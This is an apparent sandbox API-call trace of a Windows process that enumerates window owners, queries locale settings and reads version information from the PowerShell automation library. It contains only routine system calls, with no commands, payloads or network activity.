	[0613.982] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xa38
	[0613.982] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x16d0
	[0613.982] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x16d4
	[0613.982] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x15bc
	[0613.982] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x15a0
	[0613.983] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x159c
	[0613.983] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1598
	[0613.983] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1594
	[0613.983] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1590
	[0613.983] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x158c
	[0613.983] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1588
	[0613.983] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1584
	[0613.983] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1580
	[0613.984] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x157c
	[0613.984] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1488
	[0613.984] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1404
	[0613.984] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x11b8
	[0613.984] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xbd4
	[0613.984] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe0c
	[0613.984] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xd30
	[0613.984] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe70
	[0613.985] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x13b8
	[0613.985] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe20
	[0613.985] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe2c
	[0613.985] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe00
	[0613.985] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe04
	[0613.985] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xc94
	[0613.985] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x13b0
	[0613.985] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x13ac
	[0613.986] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x13a8
	[0613.986] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1374
	[0613.986] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x132c
	[0613.986] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1328
	[0613.986] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x12d0
	[0613.986] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x12cc
	[0613.986] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x12c8
	[0613.986] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1290
	[0613.987] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1218
	[0613.987] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1214
	[0613.987] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x11ec
	[0613.987] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x11e8
	[0613.987] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x11cc
	[0613.987] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1140
	[0613.987] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe6c
	[0613.987] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x6e8
	[0613.988] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xc6c
	[0615.018] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xf94
	[0618.608] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xffc
	[0619.901] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xf74
	[0619.906] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xf08
	[0619.909] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xf0c
	[0619.911] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xed8
	[0621.431] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xe90
	[0621.436] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xea8
	[0621.440] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xfa8
	[0621.443] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xfbc
	[0621.446] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xfb8
	[0621.447] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xfb4
	[0622.377] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xfb0
	[0622.791] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xfac
	[0622.795] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xfc0
	[0622.798] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xfd0
	[0622.802] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xf88
	[0622.804] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xf84
	[0623.859] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xf80
	[0624.674] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xde0
	[0624.683] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xddc
	[0624.686] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xdd8
	[0624.689] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xd34
	[0624.692] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xd10
	[0625.636] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xd0c
	[0625.641] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xc9c
	[0626.928] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xc74
	[0626.933] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xc1c
	[0626.938] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xc08
	[0626.942] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xabc
	[0626.945] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x24c
	[0626.948] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xbb0
	[0626.950] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xbfc
	[0627.863] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xb10
	[0629.496] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x374
	[0629.712] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x368
	[0629.720] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xb28
	[0630.936] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xae8
	[0630.936] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xb14
	[0630.936] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x95c
	[0630.936] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xa8c
	[0630.936] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x46c
	[0630.936] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xb3c
	[0630.936] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xa90
	[0630.936] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xad0
	[0630.936] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xa9c
	[0630.937] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xaa0
	[0630.937] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xb1c
	[0630.937] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x7e0
	[0630.937] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xa74
	[0630.937] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x694
	[0630.937] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xa28
	[0630.937] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x9b0
	[0630.937] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x8d8
	[0630.937] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x940
	[0630.937] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x93c
	[0630.938] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4ec
	[0630.938] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x150
	[0630.938] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x720
	[0630.938] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x3c4
	[0630.938] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x7d4
	[0630.938] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x6c8
	[0630.938] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xb54
	[0630.938] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xb54
	[0630.938] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xb5c
	[0630.938] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x838
	[0630.939] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x818
	[0630.939] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x5b8
	[0630.939] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x494
	[0630.939] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x1ec
	[0630.939] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x440
	[0630.939] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x7e8
	[0630.939] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x730
	[0630.939] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x2c8
	[0630.939] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x31c
	[0630.940] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x330
	[0630.940] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x128
	[0630.940] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x5c8
	[0630.940] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x6f8
	[0630.940] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x358
	[0630.940] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x73c
	[0630.940] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0xb0
	[0630.940] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x250
	[0630.941] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x240
	[0630.941] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x790
	[0630.941] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x61c
	[0630.941] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x568
	[0630.941] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x538
	[0630.941] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x540
	[0630.942] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x460
	[0630.942] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x79c
	[0630.942] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x4e0
	[0630.942] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x460
	[0630.942] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xcd960 | out: lpdwProcessId=0xcd960) returned 0x778
	[0630.947] WerSetFlags () returned 0x0
	[0630.958] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0630.958] CoTaskMemFree (pv=0x0) 
	[0630.959] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdcc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdcc0 | out: pulNumLanguages=0xcdcc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xcdcc0) returned 1
	[0630.960] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xcdcc8, pwszLanguagesBuffer=0x2cc5770, pcchLanguagesBuffer=0xcdcc0 | out: pulNumLanguages=0xcdcc8, pwszLanguagesBuffer=0x2cc5770, pcchLanguagesBuffer=0xcdcc0) returned 1
	[0630.965] CoTaskMemAlloc (cb=0x24) returned 0x28dbb0
	[0630.965] GetUserDefaultLocaleName (in: lpLocaleName=0x28dbb0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0630.966] CoTaskMemFree (pv=0x28dbb0) 
	[0633.684] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0633.684] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0633.684] CoTaskMemFree (pv=0x1f3620) 
	[0633.687] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0633.687] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0633.687] CoTaskMemFree (pv=0x1f3620) 
	[0633.689] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0633.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0633.690] CoTaskMemFree (pv=0x1f3620) 
	[0633.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0633.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0633.703] SetErrorMode (uMode=0x1) returned 0x1
	[0633.703] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd940 | out: lpFileInformation=0xcd940*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0633.703] SetErrorMode (uMode=0x1) returned 0x1
	[0633.703] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdbb0 | out: lpdwHandle=0xcdbb0) returned 0x94c
	[0635.930] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cc9000 | out: lpData=0x2cc9000) returned 1
	[0635.933] VerQueryValueW (in: pBlock=0x2cc9000, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdb28, puLen=0xcdb20 | out: lplpBuffer=0xcdb28*=0x2cc909c, puLen=0xcdb20) returned 1
	[0635.933] VerQueryValueW (in: pBlock=0x2cc9000, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcda98, puLen=0xcda90 | out: lplpBuffer=0xcda98*=0x2cc9178, puLen=0xcda90) returned 1
	[0635.933] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0635.933] CoTaskMemAlloc (cb=0x2e) returned 0x29a630
	[0635.933] lstrcpyW (in: lpString1=0x29a630, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0635.934] CoTaskMemFree (pv=0x29a630) 
	[0635.934] VerQueryValueW (in: pBlock=0x2cc9000, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcda98, puLen=0xcda90 | out: lplpBuffer=0xcda98*=0x2cc91cc, puLen=0xcda90) returned 1
	[0635.934] lstrlenW (lpString="System.Management.Automation") returned 28
	[0635.934] CoTaskMemAlloc (cb=0x3c) returned 0x296e30
	[0635.934] lstrcpyW (in: lpString1=0x296e30, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0635.934] CoTaskMemFree (pv=0x296e30) 
	[0635.934] VerQueryValueW (in: pBlock=0x2cc9000, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcda98, puLen=0xcda90 | out: lplpBuffer=0xcda98*=0x2cc9228, puLen=0xcda90) returned 1
	[0635.934] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0635.934] CoTaskMemAlloc (cb=0x20) returned 0x28de20
	[0635.934] lstrcpyW (in: lpString1=0x28de20, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0635.934] CoTaskMemFree (pv=0x28de20) 
	[0635.934] VerQueryValueW (in: pBlock=0x2cc9000, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcda98, puLen=0xcda90 | out: lplpBuffer=0xcda98*=0x2cc9268, puLen=0xcda90) returned 1
	[0635.934] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0635.934] CoTaskMemAlloc (cb=0x44) returned 0x296e30
	[0635.934] lstrcpyW (in: lpString1=0x296e30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0635.934] CoTaskMemFree (pv=0x296e30) 
	[0635.934] VerQueryValueW (in: pBlock=0x2cc9000, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcda98, puLen=0xcda90 | out: lplpBuffer=0xcda98*=0x2cc92d0, puLen=0xcda90) returned 1
	[0635.934] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0635.934] CoTaskMemAlloc (cb=0x76) returned 0x235ab0
	[0635.934] lstrcpyW (in: lpString1=0x235ab0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0635.935] CoTaskMemFree (pv=0x235ab0) 
	[0635.935] VerQueryValueW (in: pBlock=0x2cc9000, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcda98, puLen=0xcda90 | out: lplpBuffer=0xcda98*=0x2cc936c, puLen=0xcda90) returned 1
	[0635.935] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0635.935] CoTaskMemAlloc (cb=0x44) returned 0x296e30
	[0635.935] lstrcpyW (in: lpString1=0x296e30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0635.935] CoTaskMemFree (pv=0x296e30) 
	[0635.935] VerQueryValueW (in: pBlock=0x2cc9000, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcda98, puLen=0xcda90 | out: lplpBuffer=0xcda98*=0x2cc93d0, puLen=0xcda90) returned 1
	[0635.935] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0635.935] CoTaskMemAlloc (cb=0x58) returned 0x1e9eb0
	[0635.935] lstrcpyW (in: lpString1=0x1e9eb0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0635.935] CoTaskMemFree (pv=0x1e9eb0) 
